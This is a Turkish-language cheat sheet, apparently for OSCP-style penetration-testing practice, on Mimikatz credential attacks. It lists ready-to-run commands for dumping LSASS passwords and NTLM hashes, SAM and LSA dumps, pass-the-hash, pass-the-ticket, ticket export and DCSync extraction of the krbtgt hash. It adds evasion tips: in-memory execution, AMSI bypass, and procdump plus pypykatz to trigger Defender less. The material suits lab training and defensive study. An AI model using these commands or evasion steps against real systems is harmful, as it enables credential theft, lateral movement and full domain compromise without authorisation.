FOOTHOLD Metodoloji Cheat-sheet
Post ✓ EXAM-SAFE orta

Mimikatz: Credential Dumping, Pass-the-Hash ve DCSync Cekirdek Modulleri

Mimikatz ile LSASS bellekten plaintext parola/NTLM hash cekme (sekurlsa::logonpasswords), SAM/LSA dump, pass-the-hash, Kerberos ticket enjeksiyonu (ptt) ve domain admin ile DCSync uzerinden replikasyon yoluyla hash cikarma.

Bilgi: ÖN KOŞULLAR
  • Hedefte local admin / SYSTEM yetkisi (LSASS ve SAM erisimi icin)
  • DCSync icin domain replikasyon hakki (Domain Admins veya DS-Replication-Get-Changes)
  • Mimikatz.exe veya Invoke-Mimikatz hedefe tasinmis
┌──

Komutlar

mimikatz ✓ EXAM-SAFE admin
privilege::debug
SeDebugPrivilege etkinlestir — LSASS belleğine erisim icin gerekli ilk adim HackTricks — Mimikatz
mimikatz ✓ EXAM-SAFE admin
sekurlsa::logonpasswords
LSASS'tan oturum acmis kullanicilarin plaintext parola, NTLM hash ve Kerberos bilgilerini dump et HackTricks — Mimikatz / sekurlsa
mimikatz ✓ EXAM-SAFE admin
sekurlsa::pth /user:{{USER}} /domain:{{DOMAIN}} /ntlm:{{NTHASH}} /run:cmd.exe
Pass-the-Hash: NTLM hash ile yeni process baslatip o kullanicinin kimligini tasi HackTricks — Pass the Hash (Mimikatz)
mimikatz ✓ EXAM-SAFE admin
lsadump::sam
Local SAM veritabanindan local hesaplarin NTLM hashlerini cek (SYSTEM gerekir) HackTricks — Mimikatz / lsadump
mimikatz ✓ EXAM-SAFE admin
lsadump::dcsync /domain:{{DOMAIN}} /user:{{DOMAIN}}\krbtgt
DCSync: DC'yi taklit ederek replikasyon ile krbtgt (veya herhangi kullanici) hashini cek — Golden Ticket icin HackTricks — DCSync
mimikatz ✓ EXAM-SAFE user
kerberos::ptt ticket.kirbi
Pass-the-Ticket: cikarilan/forge edilen Kerberos ticket'i mevcut oturuma enjekte et HackTricks — Pass the Ticket
mimikatz ✓ EXAM-SAFE admin
lsadump::lsa /patch
LSA secrets'tan hesap hashlerini cek (alternatif local dump) HackTricks — Mimikatz / lsadump
mimikatz ✓ EXAM-SAFE admin
sekurlsa::tickets /export
Bellekteki tum Kerberos ticketlerini .kirbi olarak diske cikar HackTricks — Mimikatz / sekurlsa tickets

Genel Bakis

Mimikatz (gentilkiwi), Windows kimlik bilgisi materyalini bellekten ve veritabanlarindan cikarmaya yarayan standart araçtir. OSCP/AD ortamlarinda credential dumping, pass-the-hash, pass-the-ticket ve DCSync icin temel araçtir. Cogu modul local admin veya SYSTEM yetkisi gerektirir; DCSync ise domain replikasyon hakki ister.

On Hazirlik: privilege::debug

LSASS ile etkilesen tum sekurlsa::* modullerinden once privilege::debug calistirilir. Cikti Privilege '20' OK olmazsa muhtemelen yeterli yetki yok; token::elevate ile SYSTEM token’a yukseltmeyi deneyin.

sekurlsa — LSASS Bellek

  • sekurlsa::logonpasswords: Tum interaktif oturumlarin plaintext parolalarini (WDigest acik/eski sistemlerde), NTLM hashlerini ve Kerberos anahtarlarini listeler. En sik kullanilan moduldur.
  • sekurlsa::pth: NTLM hash ile yeni bir process baslatarak hedef kullanicinin kimligini tasir — parola bilmeden lateral movement.
  • sekurlsa::tickets /export: Bellekteki Kerberos ticketlerini disa aktarir (PtT icin).

lsadump — SAM / LSA / DCSync

  • lsadump::sam: Local SAM veritabanindan local hesap hashleri (SYSTEM gerekir).
  • lsadump::lsa /patch: LSA secrets ve hesap hashleri.
  • lsadump::dcsync: DC’yi taklit ederek Directory Replication Service (MS-DRSR) ile herhangi bir domain kullanicisinin (ozellikle krbtgt) hashini ceker. Bu, Golden Ticket uretiminin on adimidir. Domain Admins veya DS-Replication-Get-Changes + Get-Changes-All haklari gerekir.

kerberos — Ticket Manipulasyonu

  • kerberos::ptt <ticket.kirbi>: Ticket’i mevcut oturuma enjekte eder (Pass-the-Ticket).
  • kerberos::golden: krbtgt hashi ile Golden Ticket forge eder (ayri detay konu).

OPSEC ve Tespit Notlari

  • Mimikatz, Defender/AV tarafindan imza ile yakalanir; OSCP’de genelde Defender kapali laboratuvarlarda calisir. Diske dusurmeden Invoke-Mimikatz (PowerSploit) veya Evil-WinRM -s menusu ile bellekten calistirma tercih edilir; AMSI bypass gerekebilir.
  • LSASS dump’i diskten yapmak icin alternatif: procdump -ma lsass.exe lsass.dmp ile dump alip Kali’de pypykatz lsa minidump lsass.dmp calistirmak — bu Defender’i daha az tetikler.
  • Modern Windows’ta WDigest varsayilan kapali oldugundan plaintext parola cikmayabilir; bu durumda NTLM hash ile yetinilir.

Tipik Akis

privilege::debug → sekurlsa::logonpasswords (hash topla) → ele gecen hash ile help-impacket secretsdump veya help-evilwinrm PtH → domain admin ele gecince lsadump::dcsync /user:krbtgt.

┌──

Kaynaklar

↗ Mimikatz GitHub (gentilkiwi)↗ HackTricks — Mimikatz↗ HackTricks — DCSync
0/15 set